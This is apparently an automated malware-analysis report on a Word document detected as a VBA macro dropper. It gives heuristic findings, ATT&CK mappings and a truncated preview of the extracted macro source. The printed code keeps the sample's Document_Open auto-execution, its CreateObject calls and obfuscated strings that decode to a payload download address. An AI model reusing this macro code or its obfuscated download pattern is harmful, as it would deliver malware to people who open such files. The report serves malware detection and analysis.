MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initial execution. The macro's obfuscated nature and the presence of a ClamAV detection for 'Doc.Dropper.Donoff' suggest it functions as a dropper for further malicious activity. No specific URLs or executable payloads were directly extracted, but the presence of the macro itself is a primary indicator of compromise.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18031 bytes |
SHA-256: f63e06ef0dcefeb5abe3737548f122ac5b493376710868dbeae6f5afaafe596c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ADyFTx(ByVal CgWoSQjzHjT As Integer) As String
fVFlsZvAGnN
DlaETM 8198
If WjwqSCprAY(8828, "g8cmO") Then
onngWEjomOb
efQuDr = 7276
phdhFqPet 4905, "2A8"
ROrVaZgw
End If
FOQMOpsSXviN = "mjyc"
ADyFTx = "w6Pq"
End Function
Private Function dyUGaG() As Integer
diAEJELg False
TLzuTkqYu 2233, ""
ZQygxzYT
dyUGaG = 5204
End Function
Private Function tabNKagntJY() As String
If fxAbkgh(9126) Then
GpkJxYKjpOIt = 8634
ZsoIHSZY
Else
ZTYIECdlBdJJpy True
mXRcYUOVy
YsiMIRYYsyQFA
End If
hRSYbhy = True
tabNKagntJY = "6w"
End Function
Private Sub Document_Open()
bZAKvCxsaNaCq.yauawLmTpMP
End Sub
Private Function SudFVebpzoSELc(ByVal bsOLdclsyS As String, ByVal xSScZGtFiv As Integer) As Integer
MpfRWL 4374
xAfZurdXxYfeox
hpHwyvtxihSp
If qwJjTuKaBNY Then
cBtVwonu
Else
lHwXMX = "TJqY"
IVKilfjXs
lvLddIquiB
End If
SudFVebpzoSELc = 1337
End Function
Attribute VB_Name = "bZAKvCxsaNaCq"
Private Function AeaAXhVCVSLS(ByVal vhchbwp As Object, ByVal GfUxxcBfQ As Boolean) As Object
Dim GzkmODfOFbEh As Integer
SbtSUAqECTM = False
Set AeaAXhVCVSLS = vhchbwp
End Function
Public Sub yauawLmTpMP()
On Error GoTo aqudCgOf
hmPKPmyzXmp.lybeoEjW
kNCirpZWqsypXG = True
hmPKPmyzXmp.sOxIFCii
gtWIiGhAwS
Exit Sub
koCuBCfpBwJh = 5724
aqudCgOf:
End Sub
Private Sub gtWIiGhAwS()
Dim JwDDyEbVemyCr As String
Dim IsdRUPEoRZ As Integer
XbuAEIm = "IYI"
UmlXAWtHKdw 5737, MfTHfAcnroPMLw.noeWbokFGF, eWQFeJuA
dUusZxEWDaVPS = 6867
MfTHfAcnroPMLw.naIiwVSlWBzsrt 6258, MfTHfAcnroPMLw.noeWbokFGF
End Sub
Public Function OJRcJZpy(ByVal KkxvmPOfM As String) As Object
Dim imYIO As String
Dim NMeHIa As Boolean
qqwJdRlWAaeB = "XAat5"
Set OJRcJZpy = AeaAXhVCVSLS(CreateObject(KkxvmPOfM), True)
End Function
Private Function gqWTnauSfBS(ByVal HFQRSRCZHeRy As String) As Integer
If ZDVMa(8404, "mUwj") Then
VdhiTjzETz = 7354
aooyVBUADFXG
FjRSXtpNDqrD
UDEVys
laoBVtULCq = "QA"
Else
CBdyXPbcdBQBER
PNCAwHQlRxPtOf "vWyPE", 4897
ZyexuXTXn
End If
pOAPP 4147, 3708, 9625
gqWTnauSfBS = 2465
End Function
Private Sub UmlXAWtHKdw(ByVal vgXGtMqQdxUL As Integer, ByVal LLvaWp As String, ByVal zlLEgEJHIEfbBR As String)
Dim esSCO As Integer
Set NeMRpdo = NOcDCWAO.jDZhFQQYMNoGW(zlLEgEJHIEfbBR, 7913, True)
NOcDCWAO.LYzyqSkSxHkbpL "Gr4", SfVtjCsSEYmyHd, 3895, NeMRpdo
twxQt = True
MfTHfAcnroPMLw.BPBrpPlhhlBHO 6655, OWakHGhp.KdtDflEoRvO(2621, NeMRpdo, "J4z1", JzINhfXtVzDXe.PIMFZOqbAQ("R3eUgs/po3n3UsCeUBgodgyc", "rUg9cC/3")), "7nXdJ", LLvaWp
End Sub
Private Function eWQFeJuA() As String
eWQFeJuA = JzINhfXtVzDXe.PIMFZOqbAQ("RhtXt5Gp:MM//GjncjRb5-jtrveGMnMdMsv.cGoMm5X/cRMatRXalvovgXv/oRf5fjGicvXeX1v2.RvdvaXt", "RvX5GjM")
End Function
Private Function SfVtjCsSEYmyHd() As String
SfVtjCsSEYmyHd = JzINhfXtVzDXe.PIMFZOqbAQ("TCTanTh'tSG d:ojwGunl8uoa:8d: bhi18nSar1y1L f:SiLlLe", "L8G:TjS1uh")
End Function
Attribute VB_Name = "JzINhfXtVzDXe"
Private Sub scpORnPjPmTjo()
JpOxkbULw False, 4187, False
JTsNEUMEpR 3928, True, 3091
End Sub
Public Function UtEhFOdfv(ByVal FdcsXzlIM As String, ByVal fMgPBDqFgaC As Boolean, ByVal JFEkqNT As String) As String
Dim daEQyVRqXshj As Boolean
Dim ZBpvLfaCKlgvbE As Integer
wMylbtKngxioTG = "Bg"
UtEhFOdfv = FdcsXzlIM & JFEkqNT
End Function
Private Sub aOnTynXMRkFxez()
hWAxjl 3835, "5ApD", 8764
LdNdwi 5484, 760, 7177
vDIVF = 3182
JXFSmpl
End Sub
Private Function oRuQLJAznOaIrJ(ByVal sWCnPi As String, ByVal kQlzlXsNgj As String) As String
If Not RInLQb.iCcbaRfYFq("", kQlzlXsNgj, sWCnPi, "1o8tx") Then
oRuQLJAznOaIrJ = kQlzlXsNgj
End If
End Function
Private Function SzVdJPA() As Integer
tabbZPGjk = "nac"
SzVdJPA = 1
End Function
Public Function PIMFZOqbAQ(ByVal VhcvpdJv As String, ByVal nFSYJ As String) As String
Dim qKcDzz As String
Dim FfwawFLrgXDPl As String
Dim ZSpBbBPT
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.